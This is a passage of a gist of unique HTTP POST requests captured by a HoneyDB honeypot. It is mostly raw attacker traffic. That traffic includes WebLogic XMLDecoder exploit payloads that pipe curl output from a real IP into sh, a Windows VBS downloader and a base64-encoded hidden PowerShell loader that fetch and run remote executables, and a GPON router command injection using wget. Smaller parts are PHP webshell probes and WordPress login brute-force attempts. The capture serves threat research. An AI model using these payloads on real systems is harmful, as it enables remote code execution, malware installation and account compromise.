Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Unique POST requests collected from HoneyDB data
This file has been truncated, but you can view the full file.
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache
Q/Rayd3IZhxBqzgkL0J7deIVkVpJ20LD8qxp2iY6wqlhb7uJMoBoekEb9ZFuseGv3J5TnIUnC7pDXGwIc/1LM7v/5BNrkt/rlfBG7gZ4m7O7CGW0DCGfqGVXT4c7ex/ZNqFhOM1WyXCI+nAcWTbrF95VC2y3XDi1VpsMdE06YNWnmYdB57kkO1ZFTa9uxMukUBALs0kybZEXot2gj8gGd2NnoFzMpfbX85JschPX0MBY1uJV1TdhBQKcQ6h+ZBAC7JVBKqUXtuBu+ZyiJZRk7+OB/kVcWeWKqzEaavg1C1dEg4+sfjWcvU2N2DcvbPsx9aF/qYjhYuJSQ8AeawsNCcvwwlJg1aQuG+hrAPX5qkTOLzmaNTeIVqPUvdDNitzOR+WUyDoOfskqy7Txzxlf9JZy
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1043
Content-Type: multipart/form-data; boundary=WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
895028
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
711ce935c81908a4f1c10d1623d47ff4
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2--
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=172888
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÁ*4?Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
axa=die('Hello, Peppa!');
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
POST http://check.proxyradar.com/azenv.php?auth=149503078861&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 20
Cache-Control: no-cache
log=admin&pwd=aaaaaa
POST http://check.proxyradar.com/azenv.php?auth=149547882835&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 28
Cache-Control: no-cache
log=jamesatchue&pwd=99999999
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 20
Cache-Control: no-cache
log=admin&pwd=171717
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
axa=die('Hello, Peppa!');
POST http://check.proxyradar.com/azenv.php?auth=149604380857&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=monkey
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
SqNckt+eYZF7jH4xIPiStx+KsAmgALBzeeEKyXVpDXYERhZ4Tn/7gxAJAtuEdLnBGSraQCHmjktBuyNJU09rKJr0Whbgx0jJwDzFhjqoqezDe4NMY+egJmC5xZ6cW88zRTH2gmLxZ/uV2syHuBmx+qz1g317uBw6ASnBoJDz5+V4wc2nHwvHM/gPUw7m/GNZXFLWTX5y4+VGYKxgg53YwRVrRsKZBjbPymnI6fuMFRAgMO9FX1qY7VHjQEVjc3+rWzSq5SyDQisWCy7+nSxzbGkVGuXk8J9v9Sd8Q8bF9BufnmHfqV6jXQrF1QEQKqsD8isO1KkDOHFx4kXyig5/7wt9mSotStfrgvss/LIxjhx6m47dOtHf+6QQk7Mz8Heuz4aB2O7xmzwU/BrhYu4kMWyCcFVblP2H6SooiTCEchxcdGJ7Unw=
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÜôOÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÆ˛Y›∆√«∆fl
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache
log=admin&pwd=test1
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å%ÑlhÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl
POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=17&ac=50&pos=32518&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.banner","des":"","sug":-1}]
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Host: x.x.x.x
Content-Length: 0
Connection: close
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÁ*4?Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149460066237&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
m=die((string)(111111111*9))
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å/ïÊ|Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î&á.Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
m=die('Hello, Peppa!')
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache
log=admin&pwd=17233333
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅI™cÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1069
Content-Type: multipart/form-data; boundary=0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
329937
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
892970794664e96c8e660be7c39e7de0
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV--
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅI™cÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=149517555919&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 360
Cache-Control: no-cache
Q6xWx9PNbPx9u2hkZlelWbTXjU4MR+FbF0PgF4FHjZMIe6RjjuTWvskIH6GhDtkvm+J/nOqMlwY2npO1Jw4nZP+rqI6lRuvq1HslIimZ+GzOVCpRITNT/ePfHAiTdF1cxFW1dO3RDkZ6zNHs8wsRa9K5GT0w8ioKO8yGEb23o4zBfnjx0zfTmvw6DyZ76bgRdk24gXRma2/L7lp6MmMOxK5bAtoWOQp/tdoorKUKxGQISPN/R4MohWzajOs6YzvbrzWgK1YX5F8EfwKKlz2XgiCWoMTM9VT+dcxcUzysi5cYZE4yagoOU4YNv72AZ6qFmTVE7k8GjxvAqgmvMYJzcpCDxy8llDDhRvuxG7U=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åa‰ÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞-Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache
BQi0xXwWBUGT77zzl7LXfYu0hFx18CGDGsU6vGrk9HkFAZ9e2Aa0j7iB6c+RnODsuh5q7UaiDS8blMr2DYnqEv/dBbVu52tVhPyg8XqgShGUteW7KbXtibEeUdeW4lJ17y0lpLV4tJVqbRwV3DyhPxk2FxeQfqCvp2LLwDNQ8RLuhPzh4KBxvKcUrKfqBV4JBa+ZMWIFqiG/DffTYrDfP7x0l3iKL3MJXh5xiU9AZROuhrqN+FulvH2pcvxcxsokL55kMndBW6Q6M07OA9+hGRJ35G9k6at6BhuopdoTakVOp6xh84lI9hKCQeOOzPTUlrUzwF1ZsUkQjal49REteqnl81k2mPvAcG0j6uWtiKXi3lRwF3gkvjlhJm233pN0Nd9Dsw==
POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=172zxc
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ål»9≤Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÅ Y›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=149607147675&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
